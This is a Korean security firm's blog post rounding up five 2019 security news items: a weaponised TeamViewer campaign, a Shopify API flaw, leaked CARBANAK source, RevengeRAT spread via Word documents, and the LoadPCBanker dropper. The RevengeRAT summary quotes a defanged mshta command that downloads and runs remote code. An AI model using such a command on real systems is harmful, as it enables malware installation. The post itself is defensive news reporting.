Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
보안 동향[2019년 4월 24일] 주요 보안 이슈
작성일 2019-04-24 조회 574

1. [기사] 악성 팀뷰어 통해 유럽 대사관 노린 대규모 캠페인 벌어져
[https://www.boannews.com/media/view.asp?idx=78951]
팀뷰어(TeamViewer) 소프트웨어를 무기로 변형시켜서 유럽에 있는 대사관 및 외교 기관을 표적 공격하는 사이버 캠페인이 발견됐다. 공격자는 러시아 해킹 포럼에서 주로 활동하는 에바픽스(EvaPiks)로 추정되며, 단독인지 아니면 누군가의 도움을 받는 건지는 확실하지 않다고 한다. 한편 이 공격에 당한 건 이탈리아, 케냐, 버뮤다, 네팔, 가이아나, 레바논, 리베리아 7개 국가의 대사관이며, 당한 자들은 공통으로 정부 총세입 및 재정 쪽과 관련된 임무를 맡은 사람들이다. 이번 공격은 XLSM 문서가 첨부된 피싱 메일로부터 시작됐다. 첨부 파일을 다운로드하여 실행하면 문서에 포함된 매크로가 두 개의 파일을 추출한다. 하나는 정상적인 오토핫키이고, 다른 하나는 악성 버전의 오토핫키이다. 악성 버전은 C&C 서버와의 통신 채널을 연결하고 변형된 팀뷰어 프로그램을 다운로드 받아 설치한다. 체크포인트는 에바픽스는 이전에도 악성 팀뷰어를 활용한 공격에 연루되어 있으며, 꾸준히 기능을 발전시켜왔다고 밝혔다.


2. [기사] 온라인 상거래 플랫폼 쇼피파이에서 위험한 취약점 발견돼
[https://www.boannews.com/media/view.asp?idx=78938&page=1&kind=1]
한 보안 전문가가 유명 전자상거래 소프트웨어 플랫폼에서 고위험군 취약점을 발견했다. 이 플랫폼은 약 80만 개 기업들이 온라인 상거래에 활용하는 쇼피파이(Shopify)로, 아윱 파티(Ayoub Fathi)라는 보안 전문가가 “취약한 API 엔드포인트를 통해 매장 정보에 접근하는 게 가능하다”는 사실을 밝혀냈다. 파티가 발견한 취약점은 쇼피파이 엑스체인지 앱(Shopify Exchange App)이란 API 엔드 포인트로부터 발생한다. CVSS 점수를 기준으로 7.5점을 받아 고위험군에 속하며, 이는 취약점이 대단히 심각하나는 것을 알려준다. 또한 쇼피파이 플랫폼을 사용하는 고객의 트래픽 정보나 수익 정보가 노출된다고 한다. 이 취약점으로 인해 쇼피파이 플랫폼에서 활동하는 80만 개의 매장 중 12,100개가 위험에 노출되어 있으며, 그 중 8700개 매장에서는 즉각 실적 정보와 트래픽 정보를 가져갈 수 있다고 한다. 파티는 쇼피파이 사용자 고객들은 잠재적으로 자신의 영업 관련 데이터가 노출될 수 있는 것을 인지해야 한다고 언급했다. 쇼피파이 측은 해당 오류를 확인하고 패치했으며, 아직까지는 데이터 유출에 관한 정황이 없는 상태이다.


3. [기사] Source Code for CARBANAK Banking Malware Found On VirusTotal
[https://thehackernews.com/2019/04/carbanak-malware-source-code.html]
바이러스 토탈에서 카르바크(CARBNAK) 뱅킹 악성코드의 소스 코드가 발견됐다. 카르바크 소스 코드의 크기는 20MB로 755개의 파일로 구성됐으며, 39개의 바이너리와 10만줄의 코드가 있다고 한다. 카스퍼스키 랩에 따르면 카르바크는 감염, 정보수집, 위장의 3단계를 거친다. 감염 단계에서는 메일을 은행 관계자들에게 보내 첨부파일을 다운받도록 한다. 정보수집 단계는 감염된 컴퓨터의 거래가 있을 경우 녹화하여 공격자에게 보낸다. 마지막으로 위장 단계에서는 획득한 거래 정보를 바탕으로 온라인 뱅킹, E-Payment 시스템, ATMs 제어 등의 행위를 수행하여 금전을 훔친다. 카르바크를 사용한 해커 그룹은 약 6년 전부터 활동을 시작하여 전세계 100개 이상의 은행에서 10억 유로를 훔친 정황이 있다. 유럽 당국은 이 범죄 집단이 코발트- 스트라이크(Cobalt-Strike) 침투 테스트 소프트웨어를 기반으로한 코발트라는 악성코드도 개발했으며, 현재 약 3명의 용의자가 2018년 기준 기소된 상태이다.


4. [기사] Hackers Drop RevengeRAT Malware On Windows System Via Weaponized Word Document
[https://gbhackers.com/hackers-drop-revengerat-malware/]
Aggah라고 불리는 악성코드는 Word 문서를 사용하여 배포되며, Pastebin에서 사용 가능한 RevengeRAT를 드랍하여 희생자를 감염시킨다. Aggah에 사용된 RevengeRAT는 이미 오픈소스여서 자유롭게 이용 가능한 상태이다. Aggah는 주로 중동의 대형 금융 기관에서 보낸 정상적인 전자메일로 위장하여 유포된다. 사용자가 첨부된 Word 문서를 클릭하면 Template Injection을 통해 원격 OLE 문서를 로드하려고 시도한다. 원격 OLE 문서는 셸 명령을 통해 "mshta hxxp : //www.bitly [.] com / SmexEaldos3"를 실행한다. 명령이 실행되면 Microsoft Defender 프로세스를 중지하는 행위 및 여러 악성 행위를 수행하는 자바스크립트가 포함된 blogspt[.]com 블로그로 리다이렉션 된다. 팔로 알토에 따르면 블로그스팟에서 사용되는 Pastebin URL에서 페이로드 다운로드, 스케줄링된 작업 생성, 자동 실행 레지스트리 키 생성과 같은 세 가지를 수행한다. 또한 추가 분석을 통해 RevengeRAT의 변종도 발견됐다. 


5. [기사] Malware Hosted in Google Sites Sends Data to MySQL Server
[https://www.bleepingcomputer.com/news/security/malware-hosted-in-google-sites-sends-data-to-mysql-server/]
보안 연구원들이 구글 사이트 플랫폼에서 웹사이트를 제작할 때 호스팅되는 악성 프로그램을 발견했다. 이 악성 프로그램은 공격자가 제어하는 MySQL 서버로 데이터를 전송하는 정보 전송 드로퍼이다. LoadPCBanker라는 이름의 악성코드는 PDF 파일로 위장한 실행 파일이며, 구글 사이트용 파일 캐비닛 저장 공간에 저장돼 있다. 추출된 PDF의 이름은 "PDF Reservations Details MANOEL CARVALHO hospedagem familiar detalhes PDF.exe"로 영어 및 포르투갈어를 사용하는 피해자들을 목표로 하고 있다. 4월 12일 넷스코프의 연구원들은 관련 이슈를 구글 사이트에 보고했지만, 여전히 샘플이 존재하여 다운로드 가능한 상태이다. 이 악성코드는 정보 수집, 스크린샷, 클립보드 데이터 기록, 키로거 기능 등을 수행하며 SQL 데이터베이스와 연결하여 파일 다운로드 및 자격 증명도 가능하다. 넷 스코프는 해당 보고서를 작성할 당시 공격자가 약 20명의 호스트를 감시하고 있었다고 밝혔다. 또한 이와 같은 종류의 악성코드가 2014년 초부터 존재해 왔으며, 최근에는 2019년 2월부터 활발히 진행됐다고 한다. 아직 배후가 누구인지, 다른 사이버 범죄자들과 공유가 되었는지는 확인되지 않았다.

첨부파일 첨부파일이 없습니다.
태그 팀뷰어  쇼피파이  CARBNAK  Aggah  LoadPCBanker